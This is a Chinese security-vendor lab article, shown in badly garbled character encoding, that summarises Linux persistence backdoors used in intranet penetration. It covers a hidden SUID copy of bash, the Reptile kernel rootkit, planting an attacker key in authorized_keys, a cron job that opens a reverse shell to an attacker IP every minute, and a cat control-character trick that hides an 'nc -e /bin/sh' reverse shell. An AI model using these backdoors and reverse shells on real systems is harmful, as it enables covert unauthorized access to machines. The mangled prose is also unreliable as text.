• Ìá½»ÐèÇó
    *
    *

    *
    *
    *
    Á¢¼´Ìá½»
    µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

    logo

      ²úÆ·Óë·þÎñ
      ½â¾ö·½°¸
      ¼¼ÊõÖ§³Ö
      ºÏ×÷·¢Õ¹
      ¹ØÓڻƽð³Ç

      ÉêÇëÊÔÓÃ
        »Æ½ð³Ç¹ÙÍøÊµÑéÊÒ | ÄÚÍøÉøÍ¸¡ªLinuxȨÏÞά³Ö¼¼ÇÉ×ܽá
        ·¢²¼Ê±¼ä£º2020-12-25 ÔĶÁ´ÎÊý£º 403 ´Î

        ÔÚÉÏһƪÎÄÕÂÖÐÎÒÃǽéÉÜÁËÄÚÍøÉøÍ¸ÖÐWindows»·¾³Ï½øÐÐȨÏÞά³Ö£¨µã»÷ÔĶÁ£©µÄ·½Ê½£¬±¾ÆÚÎÒÃǽ«ÊӽǼ¯ÖÐÔÚLinuxϵͳÖмÌÐø¶ÔÄÚÍøÉøÍ¸ÖеÄȨÏÞά³Ö·½Ê½½øÐÐ̽Ë÷¡£LinuxÒ²ÊÇÔÚÄÚÍøÉøÍ¸Öкܳ£¼ûµÄ²Ù×÷ϵͳ£¬µ«ÊÇÆäÄÚ²¿ÊµÏÖ·½Ê½È´ÓëWindowsÓÐ×ű¾ÖʵÄÇø±ð¡£ÎÒÃÇÔÚ¶ÔWindowsȨÏÞά³Ö·½Ê½µÄ»ù´¡ÉÏ×ܽáLinuxϵͳµÄȨÏÞά³Ö·½Ê½¡£


        01¡¢SUIDºóÃÅ


        SUIDÊÇSet uidµÄ¼ò³Æ£¬µ±Ò»¸öÎļþµÄËùÊôÖ÷µÄ±êʶλÊÇx£¬ÇÒËùÊôÖ÷Ϊrootʱ£¬µ±Ö´ÐиÃÎļþʱ£¬ÊÇÒÔrootÉí·ÝÖ´ÐеÄ¡£ËùÒÔÈç¹û¹¥»÷Õß´´½¨Ò»¸öÂú×ãÉÏÊöÌõ¼þµÄÎļþ£¬²¢ÇÒʹÓøÃÎļþ·´µ¯Ò»¸öbashµÄ»°£¬¾Í»áʹһ¸öÆÕͨÓû§µÃµ½Ò»¸örootȨÏÞµÄshell¡£

        ´´½¨Îļþʱ±ØÐë¾ß±¸ÒÔÏÂÌõ¼þ£º


        SUIDȨÏÞÖ»¶Ô¶þ½øÖƳÌÐòÓÐЧ£»


        Ö´ÐÐÕß¶ÔÓڸóÌÐòÐèÒª¾ßÓÐxµÄ¿ÉÖ´ÐÐȨÏÞ£»


        ±¾È¨ÏÞ½öÔÚÖ´ÐиóÌÐòµÄ¹ý³ÌÖÐÓÐЧ£»


        ÔÚÖ´Ðйý³ÌÖÐÖ´ÐÐÕß½«¾ßÓиóÌÐòÓµÓÐÕßµÄȨÏÞ£»


        Ê×ÏÈʹÓÃrootȨÏÞ´´½¨Ò»¸ösuidȨÏÞµÄÒþ²ØÎļþ£¬Õâ¸öÎļþÊÇ/bin/bashµÄ¸´ÖÆÎļþ¡£




        Æä´Î£¬Ê¹ÓÃÆÕͨÓû§µÇÈëϵͳ£¬Ê¹ÓÃÈçÏÂÃüÁî/var/.hack -p£¬Ö´ÐиÃÎļþÒÔ»ñµÃÒ»¸öroot shell£¬Ö´Ðкó¿ÉÒÔ¿´µ½È¨ÏÞÒѾ­±ä³ÉÁËrootȨÏÞ¡£




        02¡¢LinuxÄÚºËRootkitºóÃÅ

             

        Äں˼¶Linux RootkitµÄÒþ²ØÐÔͨ³£Òª½èÖú¶ÔLinuxϵͳµ÷ÓõĽػñÀ´´ïµ½Ä¿µÄ£¬²¢ÇÒÄÑÒÔ²éɱ¡¢ÄÑÒÔÇå³ý£¬Î£º¦¾Þ´ó¡£Ö÷ÒªÊÊÓõÄÄ¿±ê°æ±¾ÈçÏ£º


        Debian 9£º4.9.0-8-amd64


        Debian 10£º4.19.0-8-amd64


        Ubuntu 18.04.1 LTS£º4.15.0-38-generic


        Kali Linux£º4.18.0-kali2-amd64


        Centos 6.10£º2.6.32- 754.6.3.el6.x86_64


        Centos 7£º3.10.0-862.3.2.el7.x86_64


        Centos 8£º4.18.0-147.5.1.el8_1.x86_64


        ÏîÄ¿µØÖ·Îª£º

        https://github.com/f0rb1dd3n/Reptile


        03¡¢SSHºóÃÅ


        SSHÊÇLinuxÌṩµÄÒ»ÖÖÔ¶³ÌµÇ½·þÎñ£¬SSH×ܹ²ÌṩÁËÁ½ÖֵǽÑéÖ¤·½Ê½£ºÒ»ÊÇÕ˺ÅÃÜÂëµÇ¼£¬Ò²Êdz£Óõĵǽ·½Ê½£»¶þÊǹ«Ë½Ô¿µÇ¼£¬SSHÔÊÐíÑéÖ¤µÇ¼ÕßÌṩµÄ˽ԿÓë×ÔÉí¹«Ô¿ÊÇ·ñÆ¥Å䣬ÒÔÈ·¶¨ÊÇ·ñÔÊÐí¸ÃÓû§µÇ¼¡£¾ßÌåÑéÖ¤·½Ê½ÈçÏ£º




        Ê×Ïȹ¥»÷ÕßÔÚ±¾µØÉú³ÉÒ»·ÝSSHµÇ¼µÄ¹«Ë½Ô¿¶Ô£¬Ê¹ÓÃÈçÏÂÃüÁî¼´¿É£º


        ssh-keygen -trsa¡£




        ʹÓÃssh-keygenÉú³ÉÁ½·ÝÎļþ£¬·Ö±ðÊÇid_rsaºÍid_rsa.pubǰÕßÊÇ˽ԿÎļþ£¬ºóÕßÊǹ«Ô¿Îļþ¡£Ê¹ÓÃijÖÖ·½·¨£¬½«¹¥»÷ÕßÉú³ÉµÄ¹«Ô¿Îļþid_rsa.pubÉÏ´«½øÄ¿±ê»ú~/.ssh/authorized_keysĿ¼Ï¼´¿É¡£




        ʹÓÃsshÖ±½ÓµÇ¼Ŀ±ê»ú¼´¿É£¬ÎÞÐèÕ˺ÅÃÜÂë¡£




        04¡¢¼Æ»®ÈÎÎñºóÃÅ


        ÓëWindowsÒ»Ñù£¬LinuxÒ²ÌṩÁ˼ƻ®ÈÎÎñ³ÌÐò£¬ÔÚLinuxϵͳÖмƻ®ÈÎÎñÒ»°ãÊÇÓÉcron³Ðµ£¡£ÎÒÃÇʹÓÃcronÌí¼ÓÒ»¸ö·´µ¯shellµÄ¼Æ»®ÈÎÎñ£¬ÒÔʵÏÖȨÏÞά³Ö¡£


        Ê×Ïȼì²éÄ¿±ê»úÊÇ·ñ¿ªÆôÁ˼ƻ®ÈÎÎñ¡£




        ÀûÓÃcron³ÌÐòдÈëÒ»¸ö¼Æ»®ÈÎÎñ£º¡¯*/1 * * * * bash -I>& /dev/tcp/<¹¥»÷ÕßIP>/<¹¥»÷Õß¶Ë¿Ú> 0>&1¡¯Ê¹Æäÿһ·ÖÖÓÏò¹¥»÷ÕßIP·¢µ¯Ò»´Îshell¡£




        ÔÚ¹¥»÷»úÉϼàÌýÏàÓ¦µÄ¶Ë¿Ú£¬¹ýÁËÒ»·ÖÖÓ¼´¿É½ÓÊÕµ½À´×ÔÄ¿±ê»úµÄ·´µ¯shell£¬ÊµÏÖȨÏÞά³Ö¡£




        05¡¢CatÃüÁîȱÏݺóÃÅ


        CatÃüÁîÊÇLinuxϵͳ×Ô´øµÄÖ¸ÁÄܹ»²é¿´ÎļþµÄ¾ßÌåÄÚÈÝ¡£µ«ÊÇCatÖ¸ÁîÈ´´æÔÚȱÏÝ£¬catĬÈÏÊÇÖ§³ÖһЩÈç »Ø³µ·û »»Ðзûf»»Ò³·ûµÈÌØÊâ·ûºÅ£¬ÕâЩ·ûºÅ¿ÉÄܵ¼ÖÂһЩÄÚÈݱ»´íÎóµÄ½âÎö£¬½ø¶øÒþ²ØÒ»Ð©ÏµÍ³ÃüÁî¡£


        ´´½¨Ò»¸öpythonÎļþ£¬Ê¹ÆäÄܹ»Éú³ÉÒ»¸ö°üº¬ÌØÊâ·ûºÅµÄ.shÎļþ£¬Õâ¸öÎļþ¿ÉÒÔ½«¶ñÒâÖ¸Áî½øÐÐÒþ²Ø¡£



        ʹÓÃÆÕͨµÄcatÖ¸Áî²é¿´Õâ¸ö.shÎļþ£¬·¢ÏÖ¶ñÒâÖ¸Áî±»Òþ²Ø¡£ÖØÐÂʹÓÃcatÖ¸Áî´øÉÏ-A²ÎÊý¼´¿É¿´µ½¸ÃÎļþµÄÕæÊµÈ«²¿ÄÚÈÝ¡£¿ÉÒԲ鿴µ½¶ñÒâÖ¸Ánc -e /bin/sh 192.168.210.37 9999¡£


        Èç¹û¹ÜÀíԱûÓÐ×Ðϸ²é¿´ÎļþµÄ¾ßÌåÄÚÈݾÍÖ´ÐÐÁ˸ÃÎļþ£¬¹¥»÷»úÔò¿ÉÒÔ½Óµ½Ò»¸öÀ´×ÔÄ¿±ê»úµÄ·´µ¯shell¡£

        Ãâ·ÑÊÔÓÃ
        ·þÎñÈÈÏß

        ÂíÉÏ×Éѯ

        400-811-3777

        »Øµ½¶¥²¿
        ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿